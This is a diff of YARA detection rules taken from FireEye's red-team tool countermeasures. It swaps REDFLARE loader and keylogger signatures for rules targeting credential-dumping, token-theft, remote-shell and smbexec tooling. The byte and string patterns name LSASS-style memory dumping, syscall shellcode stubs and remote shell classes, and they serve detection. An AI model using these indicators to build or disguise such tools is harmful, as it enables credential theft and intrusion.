+		id = "950a4744-2696-5eb7-8524-7f689cb5dbb0"
+		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Loader_Raw32_REDFLARE_1.yar#L4-L16"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/KEEPERSIST/production/yara/HackTool_MSIL_KeePersist_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "4022baddfda3858a57c9cbb0d49f6f86"
-		logic_hash = "05ed89bd82600b4d5ef01ece2e0a9bd84e968988fd2bda1bab4ec316a9a9906b"
+		hash = "dd8805d0e470e59b829d98397507d8c2"
+		logic_hash = "eae67c77a64ca07f9ef59a356bb2c3f3131f14e7f17c898ef8857a21090ace0e"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		rev = 1
+		rev = 2
 
 	strings:
-		$load = { EB ?? 58 [0-4] 8B 10 8B 48 [1-3] 8B C8 83 C1 ?? 03 D1 83 E9 [1-3] 83 C1 [1-4] FF D? }
+		$typelibguid0 = "1df47db2-7bb8-47c2-9d85-5f8d3f04a884" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) != 0x5A4D ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_APT_Controller_Linux_REDFLARE_1 : FILE
+rule FIREEYE_RT_Builder_MSIL_Sharpgenerator_1 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'SharpGenerator' project."
 		author = "FireEye"
-		id = "79a69740-7209-5c56-ad6f-eb4d0b29beaf"
-		date = "2020-12-02"
-		date = "2020-12-02"
+		id = "ab661cba-f695-59d2-9071-9b9a90233457"
+		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Controller_Linux_REDFLARE_1.yar#L4-L19"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPGENERATOR/production/yara/Builder_MSIL_SharpGenerator_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "79259451ff47b864d71fb3f94b1774f3, 82773afa0860d668d7fe40e3f22b0f3e"
-		logic_hash = "d6b0cc5f386da9bff8a8293f2b3857406044ab42f7c1bb23d5096052a3c42ce4"
+		hash = "dd8805d0e470e59b829d98397507d8c2"
+		logic_hash = "6dc0780e54d33df733aadc8a89077232baa63bf1cbe47c5d164c57ce3185dd71"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		rev = 1
 
 	strings:
-		$1 = "/RedFlare/gorat_server"
-		$2 = "RedFlare/sandals"
-		$3 = "goratsvr.CommandResponse" fullword
-		$4 = "goratsvr.CommandRequest" fullword
+		$typelibguid0 = "3f450977-d796-4016-bb78-c9e91c6a0f08" ascii nocase wide
 
 	condition:
-		( uint32( 0 ) == 0x464c457f ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_APT_Loader_Win32_REDFLARE_1 : FILE
+rule FIREEYE_RT_Tool_MSIL_Csharputils_1 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'CSharpUtils' project."
 		author = "FireEye"
-		id = "b8a2c388-3b27-5075-b0ee-2773ae0c67ad"
-		date = "2020-11-27"
-		date = "2020-11-27"
+		id = "a0e8c45a-759a-5611-aa2a-3113a75fb651"
+		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Loader_Win32_REDFLARE_1.yar#L4-L17"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPUTILS/production/yara/Tool_MSIL_CSharpUtils_1.yar#L4-L19"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "01d68343ac46db6065f888a094edfe4f"
-		logic_hash = "f9165aabe4bad215211cf98559099030ddb8a76175fbfcfee3c6f25d7614bdad"
+		hash = "dd8805d0e470e59b829d98397507d8c2"
+		logic_hash = "11dfd44fb4ee1e610c2e4a941b3a1e88eafc30a2a2237529150e73bceb2a1324"
 		score = 75
-		quality = 75
+		quality = 65
 		tags = "FILE"
 		rev = 1
 
 	strings:
-		$alloc_n_load = { 6A 40 68 00 30 00 00 [0-20] 6A 00 [0-20] FF D0 [4-60] F3 A4 [30-100] 6B C0 28 8B 4D ?? 8B 4C 01 10 8B 55 ?? 6B D2 28 }
-		$const_values = { 0F B6 ?? 83 C? 20 83 F? 6D [2-20] 83 C? 20 83 F? 7A }
+		$typelibguid0 = "2130bcd9-7dd8-4565-8414-323ec533448d" ascii nocase wide
+		$typelibguid1 = "319228f0-2c55-4ce1-ae87-9e21d7db1e40" ascii nocase wide
+		$typelibguid2 = "4471fef9-84f5-4ddd-bc0c-31f2f3e0db9e" ascii nocase wide
+		$typelibguid3 = "5c3bf9db-1167-4ef7-b04c-1d90a094f5c3" ascii nocase wide
+		$typelibguid4 = "ea383a0f-81d5-4fa8-8c57-a950da17e031" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x010B ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_APT_Trojan_Win_REDFLARE_3 : FILE
+rule FIREEYE_RT_Hacktool_PY_Impacketobfuscation_1
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "smbexec"
 		author = "FireEye"
-		id = "2f6785c4-f4d0-52ff-8c46-da953e2ca92a"
+		id = "992d1132-3136-5e1b-a1ef-dcdf36ebf0f5"
 		date = "2020-12-01"
 		date = "2020-12-01"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Trojan_Win_REDFLARE_3.yar#L4-L19"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/IMPACKETOBF (Smbexec)/production/yara/HackTool_PY_ImpacketObfuscation_1.yar#L4-L22"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "9ccda4d7511009d5572ef2f8597fba4e,ece07daca53dd0a7c23dacabf50f56f1"
-		logic_hash = "ee104bc145686a134e4d6d620dae7d1dacff7645d47f1a8d7a212327352b8e87"
+		hash = "0b1e512afe24c31531d6db6b47bac8ee"
+		logic_hash = "45a4c0426b29b8c8bede9c4e8292131da7e756d48fc3ac4a07d08fd52383d21e"
 		score = 75
-		quality = 75
-		tags = "FILE"
+		quality = 50
+		tags = ""
 		rev = 1
 
 	strings:
-		$calc_image_size = { 28 00 00 00 [2-30] 83 E2 1F [4-20] C1 F8 05 [0-8] 0F AF C? [0-30] C1 E0 02 }
-		$str1 = "CreateCompatibleBitmap" fullword
-		$str2 = "BitBlt" fullword
-		$str3 = "runCommand" fullword
+		$s1 = "class CMDEXEC" nocase
+		$s2 = "class RemoteShell" nocase
+		$s3 = "self.services_names"
+		$s4 = "import random"
+		$s6 = /self\.__shell[\x09\x20]{0,32}=[\x09\x20]{0,32}[\x22\x27]%CoMSpEC%[\x09\x20]{1,32}\/q[\x09\x20]{1,32}\/K [\x22\x27]/ nocase
+		$s7 = /self\.__serviceName[\x09\x20]{0,32}=[\x09\x20]{0,32}self\.services_names\[random\.randint\([\x09\x20]{0,32}0[\x09\x20]{0,32},[\x09\x20]{0,32}len\(self\.services_names\)[\x09\x20]{0,32}-[\x09\x20]{0,32}1\)\]/
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		all of them
 }
-rule FIREEYE_RT_APT_Keylogger_Win32_REDFLARE_1 : FILE
+rule FIREEYE_RT_Credtheft_MSIL_Titospecial_1 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "This rule looks for .NET PE files that have the strings of various method names in the TitoSpecial code."
 		author = "FireEye"
-		id = "ad14db66-d640-5712-b2c8-a3d42d5a90f3"
-		date = "2020-12-01"
-		date = "2020-12-01"
+		id = "932bb013-03de-5cf7-89e9-b3232151d303"
+		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Keylogger_Win32_REDFLARE_1.yar#L4-L17"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/TITOSPECIAL/production/yara/CredTheft_MSIL_TitoSpecial_1.yar#L4-L27"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "d7cfb9fbcf19ce881180f757aeec77dd"
-		logic_hash = "aebbaa050bee3775ffac4214ea4ab58284384e7eb41e66ee4838b9359e72821e"
+		hash = "4bf96a7040a683bd34c618431e571e26"
+		logic_hash = "4ac9a5ede4aea5d73545b459eb635f87ce08ba521afa48b76d2cfa94f1379226"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		rev = 2
+		rev = 4
 
 	strings:
-		$create_window = { 6A 00 68 [4] 6A 00 6A 00 68 00 00 00 80 68 00 00 00 80 68 00 00 00 80 68 00 00 00 80 68 00 00 CF 00 68 [4] 68 [4] 6A 00 FF 15 }
-		$keys_check = { 6A 14 [0-5] FF [1-5] 6A 10 [0-5] FF [1-5] B9 00 80 FF FF 66 85 C1 75 ?? 68 A0 00 00 00 FF [1-5] B9 00 80 FF FF 66 85 C1 75 ?? 68 A1 00 00 00 FF [1-5] B9 00 80 FF FF 66 85 C1 74 }
+		$str1 = "Minidump" ascii wide
+		$str2 = "dumpType" ascii wide
+		$str3 = "WriteProcessMemory" ascii wide
+		$str4 = "bInheritHandle" ascii wide
+		$str5 = "GetProcessById" ascii wide
+		$str6 = "SafeHandle" ascii wide
+		$str7 = "BeginInvoke" ascii wide
+		$str8 = "EndInvoke" ascii wide
+		$str9 = "ConsoleApplication1" ascii wide
+		$str10 = "getOSInfo" ascii wide
+		$str11 = "OpenProcess" ascii wide
+		$str12 = "LoadLibrary" ascii wide
+		$str13 = "GetProcAddress" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x010B ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of ( $str* )
 }
-rule FIREEYE_RT_APT_Trojan_Win_REDFLARE_8 : FILE
+rule FIREEYE_RT_APT_Hacktool_MSIL_TITOSPECIAL_1 : FILE
 {
 	meta:
 		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "b090df60-8f4e-51ca-944c-6f9ce2d9c913"
-		date = "2020-12-02"
-		date = "2020-12-02"
+		id = "b12490ba-41f6-5469-bcbb-0d2e0055c193"
+		date = "2020-11-25"
+		date = "2020-11-25"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Trojan_Win_REDFLARE_8.yar#L4-L22"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/TITOSPECIAL/production/yara/APT_HackTool_MSIL_TITOSPECIAL_1.yar#L4-L20"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "9c8eb908b8c1cda46e844c24f65d9370, 9e85713d615bda23785faf660c1b872c"
-		logic_hash = "5b8a0402886daebefb995e7df0877d51727c5b8dc58eeb8ff16ceec5e7811a20"
+		hash = "4bf96a7040a683bd34c618431e571e26"
+		logic_hash = "6def0c667d38c1bad9233628e509bdcaed322e75be4ff3823b0f788c391e090c"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		rev = 1
+		rev = 5
 
 	strings:
-		$1 = "PSRunner.PSRunner" fullword
-		$2 = "CorBindToRuntime" fullword
-		$3 = "ReportEventW" fullword
-		$4 = "InvokePS" fullword wide
-		$5 = "runCommand" fullword
-		$6 = "initialize" fullword
-		$trap = { 03 40 00 80 E8 [4] CC }
+		$ind_dump = { 1F 10 16 28 [2] 00 0A 6F [2] 00 0A [50-200] 18 19 18 73 [2] 00 0A 13 [1-4] 06 07 11 ?? 6F [2] 00 0A 18 7E [2] 00 0A 7E [2] 00 0A 7E [2] 00 0A 28 [2] 00 06 }
+		$ind_s1 = "NtReadVirtualMemory" fullword wide
+		$ind_s2 = "WriteProcessMemory" fullword
+		$shellcode_x64 = { 4C 8B D1 B8 3C 00 00 00 0F 05 C3 }
+		$shellcode_x86 = { B8 3C 00 00 00 33 C9 8D 54 24 04 64 FF 15 C0 00 00 00 83 C4 04 C2 14 00 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of ( $ind* ) and any of ( $shellcode* )
 }
-rule FIREEYE_RT_APT_Trojan_Win_REDFLARE_4 : FILE
+rule FIREEYE_RT_Hacktool_Win32_Andrewspecial_1 : FILE
 {
 	meta:
 		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "6e8621b0-a0ee-5fc7-a2b8-1973a42d6e37"
-		date = "2020-12-01"
-		date = "2020-12-01"
+		id = "69e27e92-d68e-5543-bada-170e32733dbb"
+		date = "2020-11-25"
+		date = "2020-11-25"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Trojan_Win_REDFLARE_4.yar#L4-L19"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/TITOSPECIAL/production/yara/HackTool_Win32_AndrewSpecial_1.yar#L4-L18"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "a8b5dcfea5e87bf0e95176daa243943d, 9dcb6424662941d746576e62712220aa"
-		logic_hash = "d027e98ad8fa6d03a49ceffd81fba6a621173e2dbabae652bee2f4e8489bb378"
+		hash = "e89efa88e3fda86be48c0cc8f2ef7230"
+		logic_hash = "529a49fb21250069111d03a174901dc2e1623ee2a1f446aae1bdb1579a227dd3"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		rev = 2
+		rev = 4
 
 	strings:
-		$s1 = "LogonUserW" fullword
-		$s2 = "ImpersonateLoggedOnUser" fullword
-		$s3 = "runCommand" fullword
-		$user_logon = { 22 02 00 00 [1-10] 02 02 00 00 [0-4] E8 [4-40] ( 09 00 00 00 [1-10] 03 00 00 00 | 6A 03 6A 09 ) [4-30] FF 15 [4] 85 C0 7? }
+		$dump = { 6A 00 68 FF FF 1F 00 FF 15 [4] 89 45 ?? 83 [2] 00 [1-50] 6A 00 68 80 00 00 00 6A 02 6A 00 6A 00 68 00 00 00 10 68 [4] FF 15 [4] 89 45 [10-70] 6A 00 6A 00 6A 00 6A 02 8B [2-4] 5? 8B [2-4] 5? 8B [2-4] 5? E8 [4-20] FF 15 }
+		$shellcode_x86 = { B8 3C 00 00 00 33 C9 8D 54 24 04 64 FF 15 C0 00 00 00 83 C4 04 C2 14 00 }
+		$shellcode_x86_inline = { C6 45 ?? B8 C6 45 ?? 3C C6 45 ?? 00 C6 45 ?? 00 C6 45 ?? 00 C6 45 ?? 33 C6 45 ?? C9 C6 45 ?? 8D C6 45 ?? 54 C6 45 ?? 24 C6 45 ?? 04 C6 45 ?? 64 C6 45 ?? FF C6 45 ?? 15 C6 45 ?? C0 C6 45 ?? 00 C6 45 ?? 00 C6 45 ?? 00 C6 45 ?? 83 C6 45 ?? C4 C6 45 ?? 04 C6 45 ?? C2 C6 45 ?? 14 C6 45 ?? 00 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x010B ) and $dump and any of ( $shellcode* )
 }
-rule FIREEYE_RT_APT_Loader_Win64_REDFLARE_2 : FILE
+rule FIREEYE_RT_Credtheft_MSIL_Titospecial_2 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the TitoSpecial project. There are 2 GUIDs in this rule as the x86 and x64 versions of this tool use a different ProjectGuid."
 		author = "FireEye"
-		id = "043f4e29-710d-5e17-a0ed-82cd3a565194"
-		date = "2020-11-27"
-		date = "2020-11-27"
+		id = "0262c720-e6b8-5bf2-a242-19a7f044973f"
+		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Loader_Win64_REDFLARE_2.yar#L4-L18"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/TITOSPECIAL/production/yara/CredTheft_MSIL_TitoSpecial_2.yar#L4-L16"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "100d73b35f23b2fe84bf7cd37140bf4d"
-		logic_hash = "9fad845ed963fae46ac7ddc44407d5f6ed0a061f6a106764b9f912ef718279b4"
+		hash = "4bf96a7040a683bd34c618431e571e26"
+		logic_hash = "2f621f8de2a4679e6cbce7f41859eaa3095ca54090c8bfccd3b767590ac91f2c"
 		score = 75
-		quality = 75
+		quality = 71
 		tags = "FILE"
-		rev = 1
+		rev = 4
 
 	strings:
-		$alloc = { 45 8B C0 33 D2 [2-6] 00 10 00 00 [2-6] 04 00 00 00 [1-6] FF 15 [4-60] FF 15 [4] 85 C0 [4-40] 20 00 00 00 [4-40] FF 15 [4] 85 C0 }
-		$inject = { 83 F8 01 [2-20] 33 C0 45 33 C9 [3-10] 45 33 C0 [3-10] 33 D2 [30-100] FF 15 [4] 85 C0 [20-100] 01 00 10 00 [0-10] FF 15 [4] 85 C0 [4-30] FF 15 [4] 85 C0 [2-20] FF 15 [4] 83 F8 FF }
-		$s1 = "ResumeThread" fullword
+		$typelibguid1 = "C6D94B4C-B063-4DEB-A83A-397BA08515D3" ascii nocase wide
+		$typelibguid2 = "3b5320cf-74c1-494e-b2c8-a94a24380e60" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( $typelibguid1 or $typelibguid2 )
 }
-rule FIREEYE_RT_APT_Trojan_Win_REDFLARE_5 : FILE
+rule FIREEYE_RT_Hacktool_Win64_Andrewspecial_1 : FILE
 {
 	meta:
 		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "892981d6-f310-5ee8-95b5-dd4bd720a86c"
-		date = "2020-12-01"
-		date = "2020-12-01"
+		id = "20ce4902-4eb3-5ecf-aa8c-0515965dde57"
+		date = "2020-11-25"
+		date = "2020-11-25"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Trojan_Win_REDFLARE_5.yar#L4-L20"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/TITOSPECIAL/production/yara/HackTool_Win64_AndrewSpecial_1.yar#L4-L18"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "dfbb1b988c239ade4c23856e42d4127b, 3322fba40c4de7e3de0fda1123b0bf5d"
-		logic_hash = "ab38e5ebded026829672941709797b40f8e13fb244b6a8ed3545de4358f727b8"
+		hash = "4456e52f6f8543c3ba76cb25ea3e9bd2"
+		logic_hash = "96f06c46dfec795fcfd08c188853d0a3f781003ae118833719a175eb59049c0d"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		rev = 3
+		rev = 5
 
 	strings:
-		$s1 = "AdjustTokenPrivileges" fullword
-		$s2 = "LookupPrivilegeValueW" fullword
-		$s3 = "ImpersonateLoggedOnUser" fullword
-		$s4 = "runCommand" fullword
-		$steal_token = { FF 15 [4] 85 C0 [1-40] C7 44 24 ?? 01 00 00 00 [0-20] C7 44 24 ?? 02 00 00 00 [0-20] FF 15 [4] FF [1-5] 85 C0 [4-40] 00 04 00 00 FF 15 [4-5] 85 C0 [2-20] ( BA 0F 00 00 00 | 6A 0F ) [1-4] FF 15 [4] 85 C0 74 [1-20] FF 15 [4] 85 C0 74 [1-20] ( 6A 0B | B9 0B 00 00 00 ) E8 }
+		$dump = { 33 D2 B9 FF FF 1F 00 FF 15 [10-90] 00 00 00 00 [2-6] 80 00 00 00 [2-6] 02 00 00 00 45 33 C9 45 33 C0 BA 00 00 00 10 48 8D 0D [4] FF 15 [4-120] 00 00 00 00 [2-6] 00 00 00 00 [2-6] 00 00 00 00 41 B9 02 00 00 00 [6-15] E8 [4-20] FF 15 }
+		$shellcode_x64 = { 4C 8B D1 B8 3C 00 00 00 0F 05 C3 }
+		$shellcode_x64_inline = { C6 44 24 ?? 4C C6 44 24 ?? 8B C6 44 24 ?? D1 C6 44 24 ?? B8 C6 44 24 ?? 3C C6 44 24 ?? 00 C6 44 24 ?? 00 C6 44 24 ?? 00 C6 44 24 ?? 0F C6 44 24 ?? 05 C6 44 24 ?? C3 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and $dump and any of ( $shellcode* )
 }
-rule FIREEYE_RT_APT_Loader_Win32_REDFLARE_2 : FILE
+rule FIREEYE_RT_Loader_MSIL_Wmirunner_1 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'WMIRunner' project."
 		author = "FireEye"
-		id = "6a585401-bfd3-5aad-b484-09b6a30d9af5"
-		date = "2020-11-27"
-		date = "2020-11-27"
+		id = "04c6acfc-859f-5e4a-8c59-9adf08f21657"
+		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Loader_Win32_REDFLARE_2.yar#L4-L17"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/WMIRUNNER/production/yara/Loader_MSIL_WMIRunner_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "4e7e90c7147ee8aa01275894734f4492"
-		logic_hash = "98dfb71adbde4f8965e612c19f0965d8fa95805825569290fdf72eb1d86cfb70"
+		hash = "dd8805d0e470e59b829d98397507d8c2"
+		logic_hash = "49d21756a4f0b29909c4b0fa9f3a98dd0480f9401923032de4b3920814b85f29"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		rev = 1
 
 	strings:
-		$inject = { 83 F8 01 [4-50] 6A 00 6A 00 68 04 00 00 08 6A 00 6A 00 6A 00 6A 00 5? [10-70] FF 15 [4] 85 C0 [1-20] 6A 04 68 00 10 00 00 5? 6A 00 5? [1-10] FF 15 [4-8] 85 C0 [1-20] 5? 5? 5? 8B [1-4] 5? 5? FF 15 [4] 85 C0 [1-20] 6A 20 [4-20] FF 15 [4] 85 C0 [1-40] 01 00 01 00 [2-20] FF 15 [4] 85 C0 [1-30] FF 15 [4] 85 C0 [1-20] FF 15 [4] 83 F8 FF }
-		$s1 = "ResumeThread"
+		$typelibguid0 = "6cc61995-9fd5-4649-b3cc-6f001d60ceda" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x010B ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_APT_Keylogger_Win64_REDFLARE_1 : FILE
+rule FIREEYE_RT_Builder_MSIL_Sinfuloffice_1 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'SinfulOffice' project."
 		author = "FireEye"
-		id = "3c980f5a-c775-5c25-ba28-91a93a1b9a85"
-		date = "2020-12-01"
-		date = "2020-12-01"
+		id = "cf020fb3-751b-5346-8c0d-dc0a552599a3"
+		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Keylogger_Win64_REDFLARE_1.yar#L4-L17"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SINFULOFFICE/production/yara/Builder_MSIL_SinfulOffice_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "fbefb4074f1672a3c29c1a47595ea261"
-		logic_hash = "26fe577ba637c484d9a8ccc2173b5892a76328a90a39a2bebbae6bd2a6329485"
+		hash = "dd8805d0e470e59b829d98397507d8c2"
+		logic_hash = "b5d49a8720e4daa21e95ec66299daec42e65906017de886ea91f7bb6bfb04c77"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		rev = 1
 
 	strings:
-		$create_window = { 41 B9 00 00 CF 00 [4-40] 33 C9 [2-10] 00 00 00 80 [2-10] 00 00 00 80 [2-10] 00 00 00 80 [2-10] 00 00 00 80 FF 15 }
-		$keys_check = { B9 14 00 00 00 FF 15 [4-8] B9 10 00 00 00 FF 15 [4] BE 00 80 FF FF 66 85 C6 75 ?? B9 A0 00 00 00 FF 15 [4] 66 85 C6 75 ?? B9 A1 00 00 00 FF 15 [4] 66 85 C6 74 }
